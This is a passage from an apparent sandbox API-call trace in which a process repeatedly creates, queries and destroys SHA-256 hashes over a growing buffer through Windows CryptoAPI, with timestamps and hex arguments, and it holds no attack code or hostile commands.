	[0119.085] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fece8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fece8, pdwDataLen=0x12942c) returned 1
	[0119.086] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.086] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.086] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.086] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.086] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb40, dwFlags=0x0) returned 1
	[0119.086] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.086] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fed10
	[0119.086] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fed10, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fed10, pdwDataLen=0x12942c) returned 1
	[0119.086] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.086] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.086] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.086] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.086] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xb60, dwFlags=0x0) returned 1
	[0119.087] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fed38
	[0119.087] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fed38, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fed38, pdwDataLen=0x12942c) returned 1
	[0119.087] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.087] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.087] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.087] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.087] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xb80, dwFlags=0x0) returned 1
	[0119.087] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.087] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fed60
	[0119.087] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fed60, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fed60, pdwDataLen=0x12942c) returned 1
	[0119.087] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.087] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.087] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.088] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.088] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xba0, dwFlags=0x0) returned 1
	[0119.088] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fed88
	[0119.088] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fed88, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fed88, pdwDataLen=0x12942c) returned 1
	[0119.088] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.088] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.088] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.088] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.088] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xbc0, dwFlags=0x0) returned 1
	[0119.088] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.088] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fedb0
	[0119.088] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fedb0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fedb0, pdwDataLen=0x12942c) returned 1
	[0119.088] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.088] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.088] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.089] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.089] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xbe0, dwFlags=0x0) returned 1
	[0119.089] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fedd8
	[0119.089] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fedd8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fedd8, pdwDataLen=0x12942c) returned 1
	[0119.089] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.089] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.089] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.089] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.089] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc00, dwFlags=0x0) returned 1
	[0119.089] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.089] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fee00
	[0119.089] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fee00, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fee00, pdwDataLen=0x12942c) returned 1
	[0119.089] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.089] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.089] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.090] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.090] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xc20, dwFlags=0x0) returned 1
	[0119.090] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fee28
	[0119.090] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fee28, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fee28, pdwDataLen=0x12942c) returned 1
	[0119.090] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.090] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.090] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.090] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.090] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc40, dwFlags=0x0) returned 1
	[0119.090] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.090] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fee50
	[0119.090] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fee50, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fee50, pdwDataLen=0x12942c) returned 1
	[0119.090] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.090] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.090] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.091] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.091] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xc60, dwFlags=0x0) returned 1
	[0119.091] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fee78
	[0119.091] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fee78, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fee78, pdwDataLen=0x12942c) returned 1
	[0119.091] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.091] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.091] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.091] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.091] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xc80, dwFlags=0x0) returned 1
	[0119.091] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.091] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feea0
	[0119.091] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22feea0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feea0, pdwDataLen=0x12942c) returned 1
	[0119.091] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.091] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.091] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.092] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.092] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xca0, dwFlags=0x0) returned 1
	[0119.092] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feec8
	[0119.092] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22feec8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feec8, pdwDataLen=0x12942c) returned 1
	[0119.092] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.092] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.092] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.092] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.092] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xcc0, dwFlags=0x0) returned 1
	[0119.092] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.092] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22feef0
	[0119.092] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22feef0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22feef0, pdwDataLen=0x12942c) returned 1
	[0119.092] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.092] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.092] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.093] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.093] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xce0, dwFlags=0x0) returned 1
	[0119.093] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fef18
	[0119.093] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fef18, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fef18, pdwDataLen=0x12942c) returned 1
	[0119.093] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.093] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.093] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.093] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.093] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd00, dwFlags=0x0) returned 1
	[0119.093] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.093] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fef40
	[0119.093] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fef40, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fef40, pdwDataLen=0x12942c) returned 1
	[0119.094] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.094] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.094] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.094] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.094] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xd20, dwFlags=0x0) returned 1
	[0119.094] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.094] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fef68
	[0119.094] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fef68, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fef68, pdwDataLen=0x12942c) returned 1
	[0119.094] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.094] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.094] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.094] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.094] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd40, dwFlags=0x0) returned 1
	[0119.095] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fef90
	[0119.095] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22fef90, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fef90, pdwDataLen=0x12942c) returned 1
	[0119.095] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.095] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.095] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.095] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.095] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xd60, dwFlags=0x0) returned 1
	[0119.095] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22fefb8
	[0119.095] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22fefb8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x22fefb8, pdwDataLen=0x12942c) returned 1
	[0119.095] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.095] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.095] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.095] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.096] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xd80, dwFlags=0x0) returned 1
	[0119.096] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307000
	[0119.096] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307000, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307000, pdwDataLen=0x12942c) returned 1
	[0119.096] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.096] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.096] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.096] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.096] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xda0, dwFlags=0x0) returned 1
	[0119.096] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.096] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307028
	[0119.096] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307028, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307028, pdwDataLen=0x12942c) returned 1
	[0119.096] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.096] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.096] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.097] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.097] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xdc0, dwFlags=0x0) returned 1
	[0119.097] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307050
	[0119.097] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x2307050, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307050, pdwDataLen=0x12942c) returned 1
	[0119.097] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.097] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.097] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.097] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.097] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xde0, dwFlags=0x0) returned 1
	[0119.097] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.097] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2307078
	[0119.097] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x2307078, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x2307078, pdwDataLen=0x12942c) returned 1
	[0119.097] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.097] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.097] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.098] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.098] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe00, dwFlags=0x0) returned 1
	[0119.098] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23070a0
	[0119.098] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x23070a0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23070a0, pdwDataLen=0x12942c) returned 1
	[0119.098] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.098] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.098] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.098] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.098] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe20, dwFlags=0x0) returned 1
	[0119.098] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.098] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23070c8
	[0119.098] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x23070c8, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23070c8, pdwDataLen=0x12942c) returned 1
	[0119.098] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0119.098] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.098] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.099] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.099] CryptHashData (hHash=0x22b65c0, pbData=0x26b7778, dwDataLen=0xe40, dwFlags=0x0) returned 1
	[0119.099] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
	[0119.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x23070f0
	[0119.099] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x23070f0, pdwDataLen=0x12942c, dwFlags=0x0 | out: pbData=0x23070f0, pdwDataLen=0x12942c) returned 1
	[0119.099] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0119.099] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0119.099] CryptAcquireContextW (in: phProv=0x129430, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129430*=0x225528) returned 1
	[0119.099] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129434 | out: phHash=0x129434) returned 1
	[0119.099] CryptHashData (hHash=0x22b6600, pbData=0x26b7778, dwDataLen=0xe60, dwFlags=0x0) returned 1
	[0119.099] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x12942c, pdwDataLen=0x129428, dwFlags=0x0 | out: pbData=0x12942c, pdwDataLen=0x129428) returned 1
